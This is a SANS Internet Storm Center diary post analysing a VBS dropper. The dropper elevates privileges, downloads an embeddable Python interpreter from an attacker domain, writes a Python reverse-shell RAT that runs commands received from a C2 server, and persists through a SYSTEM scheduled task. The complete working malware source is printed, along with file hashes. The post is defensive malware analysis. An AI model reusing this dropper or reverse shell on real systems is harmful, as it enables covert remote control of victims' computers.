Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

No Python Interpreter? This Simple RAT Installs Its Own Copy

Published: 2021-04-09
Last Updated: 2021-04-09 06:26:38 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

For a while, I'm keeping an eye on malicious Python code targeting Windows environments[1][2]. If Python looks more and more popular, attackers are facing a major issue: Python is not installed by default on most Windows operating systems. Python is often available on developers, system/network administrators, or security teams. Like the proverb says: "You are never better served than by yourself", I found a simple Python backdoor that installs its own copy of the Python interpreter!

The backdoor is installed via a VBS script (SHA256:eda050c767cb65150b1f4c8a4307c15baf5aebf211367191aaf7ede3aee823d5) has a VT score of 11/58[3]. I don't know how it is delivered and executed on the target computer but, it is light and easy to read. Here is a full copy:

 1    If Not WScript.Arguments.Named.Exists("elevate") Then
 2      CreateObject("Shell.Application").ShellExecute WScript.FullName _
 3        , """" & WScript.ScriptFullName & """ /elevate", "", "runas", 1
 4      WScript.Quit
 5    End If
 6    Set objFSO=CreateObject("Scripting.FileSystemObject")
 7    If objFSO.FileExists("C:\Program Files\Windows socket\socket.bat") then
 8    WScript.Quit 1
 9    End If
10    Set oShell = WScript.CreateObject ("WScript.Shell")
11    oShell.run "cmd /c mkdir C:\""Program Files""\python389", 0
12    oShell.run "cmd /c mkdir C:\""Program Files""\""Windows socket""", 0
13    WScript.Sleep 1200
14    oShell.run "powershell -c ""(New-Object System.NET.Webclient).DownloadFile('hxxp://friz[.]ga/payloads/python-3.8.9-embed-amd64.zip','C:\Program Files\python389\python-3.8.9-embed-amd64.zip');""", 0, 1
15    set objShell = CreateObject("Shell.Application")
16    set FilesInZip=objShell.NameSpace("C:\Program Files\python389\python-3.8.9-embed-amd64.zip").items
17    objShell.NameSpace("C:\Program Files\python389").CopyHere(FilesInZip)
18    Set objFSO=CreateObject("Scripting.FileSystemObject")
19    outBat="c:\Program Files\Windows socket\socket.bat"
20    Set objSocket = objFSO.CreateTextFile(outBat,True)
21    objSocket.WriteLine "C:\""Program Files""\python389\python.exe ""C:\Program Files\Windows socket\rat.py"""
22    outPython="c:\Program Files\Windows socket\rat.py"
23    Set objPython = objFSO.CreateTextFile(outPython,True)
24    objPython.WriteLine "import socket"
25    objPython.WriteLine "import os"
26    objPython.WriteLine "import subprocess"
27    objPython.WriteLine "sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)"
28    objPython.WriteLine "sock.connect(('friz.ga', 7676))"
29    objPython.WriteLine "sock.send(b'c\\r\\n')"
30    objPython.WriteLine ""
31    objPython.WriteLine "while 1:"
32    objPython.WriteLine "    output = ''"
33    objPython.WriteLine "    data = sock.recv(1024)"
34    objPython.WriteLine "    msg = data.decode('UTF-8')"
35    objPython.WriteLine "    print(msg)"
36    objPython.WriteLine "    try:"
37    objPython.WriteLine "        output = subprocess.check_output(['cmd.exe', f'/c {msg}']) "
38    objPython.WriteLine "        print(output)   "
39    objPython.WriteLine "    except subprocess.CalledProcessError as err:"
40    objPython.WriteLine "        print(err)"
41    objPython.WriteLine "    #sock.send(bytes(output, 'utf-8'))"
42    objPython.WriteLine ""
43    objPython.WriteLine "    try:"
44    objPython.WriteLine "        sock.send(output)"
45    objPython.WriteLine "    except:"
46    objPython.WriteLine "        pass"
47    objPython.WriteLine "  "
48    objPython.WriteLine ""
49    objPython.WriteLine "    if not data:"
50    objPython.WriteLine "        pass"
51    objPython.WriteLine "        #sock.send(b'\n')"
52    objPython.WriteLine "    "
53    objPython.WriteLine ""
54    objPython.WriteLine "conn.close"
55    oShell.run "schtasks /create /F /ru ""SYSTEM"" /sc onlogon /tn WinSocket /rl highest /tr ""\""C:\Program Files\Windows socket\socket.bat""\"" ", 0
56    oshell.run "schtasks /run /I /TN WinSocket", 0

First, the script tries to elevate its privileges (lines 1-5) with a common technique. Files will be dropped in two directories (lines 11-12). A Python environment is downloaded and extracted in C:\Program Files\python389 (lines 14-17). A batch file is created (lines 19-21) to execute the RAT ("C:\Program Files\python389\python.exe" "C:\Program Files\Windows socket\rat.py"). Finally, the RAT is created (lines 22-54). Here is a cleaner code:

import socket
import os
import subprocess
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('friz[.]ga', 7676))
sock.send(b'c\\r\\n')
while 1:
    output = ''
    data = sock.recv(1024)
    msg = data.decode('UTF-8')
    print(msg)
    try:
        output = subprocess.check_output(['cmd.exe', f'/c {msg}']) 
        print(output)   "
    except subprocess.CalledProcessError as err:
        print(err)
    #sock.send(bytes(output, 'utf-8'))

    try:
        sock.send(output)
    except:
        pass

    if not data:
        pass
        #sock.send(b'\n')
conn.close

The script is easy to understand, it connects to the C2 (friz[.]ga:7676) and expects some commands. They are executed and the result is sent back.

Finally, persistence is achieved through the creation of a scheduled task (lines 55-56).

This technique may look pretty invasive because a Python environment requires the installation of many files but the archive dropped by this script is the "embeddable package"[4] that contains the minimum set of files (SHA256:6d9a18cee86819d86442fc67d4ffe9fd5819cbaedd350b4c92b84160bd1acd48):

remnux@remnux:/MalwareZoo/20210409$ unzip -t python-3.8.9-embed-amd64.zip 
Archive:  python-3.8.9-embed-amd64.zip
    testing: python.exe               OK
    testing: pythonw.exe              OK
    testing: python38.dll             OK
    testing: python3.dll              OK
    testing: vcruntime140.dll         OK
    testing: vcruntime140_1.dll       OK
    testing: LICENSE.txt              OK
    testing: pyexpat.pyd              OK
    testing: select.pyd               OK
    testing: unicodedata.pyd          OK
    testing: winsound.pyd             OK
    testing: _asyncio.pyd             OK
    testing: _bz2.pyd                 OK
    testing: _ctypes.pyd              OK
    testing: _decimal.pyd             OK
    testing: _elementtree.pyd         OK
    testing: _hashlib.pyd             OK
    testing: _lzma.pyd                OK
    testing: _msi.pyd                 OK
    testing: _multiprocessing.pyd     OK
    testing: _overlapped.pyd          OK
    testing: _queue.pyd               OK
    testing: _socket.pyd              OK
    testing: _sqlite3.pyd             OK
    testing: _ssl.pyd                 OK
    testing: libcrypto-1_1.dll        OK
    testing: libffi-7.dll             OK
    testing: libssl-1_1.dll           OK
    testing: sqlite3.dll              OK
    testing: python38.zip             OK
    testing: python38._pth            OK
    testing: python.cat               OK
No errors detected in compressed data of python-3.8.9-embed-amd64.zip.

[1] https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530
[2] https://isc.sans.edu/forums/diary/Simple+Python+Keylogger/27216
[3] https://www.virustotal.com/gui/file/eda050c767cb65150b1f4c8a4307c15baf5aebf211367191aaf7ede3aee823d5/detection
[4] https://www.python.org/downloads/windows/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Simple Powershell Ransomware Creating a 7Z Archive of your Files
Apr 8th 2021
2 days ago by Xme (0 comments)

WiFi IDS and Private MAC Addresses
Apr 7th 2021
3 days ago by Johannes (0 comments)

Malspam with Lokibot vs. Outlook and RFCs
Apr 6th 2021
3 days ago by Jan (0 comments)

YARA and CyberChef: ZIP
Apr 4th 2021
5 days ago by DidierStevens (0 comments)

Video: YARA and CyberChef
Apr 4th 2021
5 days ago by DidierStevens (0 comments)

View All Diaries →

Latest Discussions

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
1 month ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
1 month ago by astraea (0 replies)

PFSense
created Dec 23rd 2020
3 months ago by bas.auer@auerplace.nl (6 replies)

Port 23 & 2323 107.173.58.179
created Nov 15th 2020
4 months ago by Anonymous (0 replies)

Gmail hacked vis MS Outlook / request.zip virus/malware
created Oct 13th 2020
5 months ago by Anonymous (3 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
1 year ago by Brad (0 comments)

Qakbot infection with Cobalt Strike
Mar 3rd 2021
1 month ago by Brad (0 comments)

Fun with DNS over TLS (DoT)
Mar 1st 2021
1 month ago by Rob VandenBrink (0 comments)

Adversary Simulation with Sim
Mar 2nd 2021
1 month ago by Russ McRee (0 comments)

Maldocs: Protection Passwords
Feb 28th 2021
1 month ago by DidierStevens (0 comments)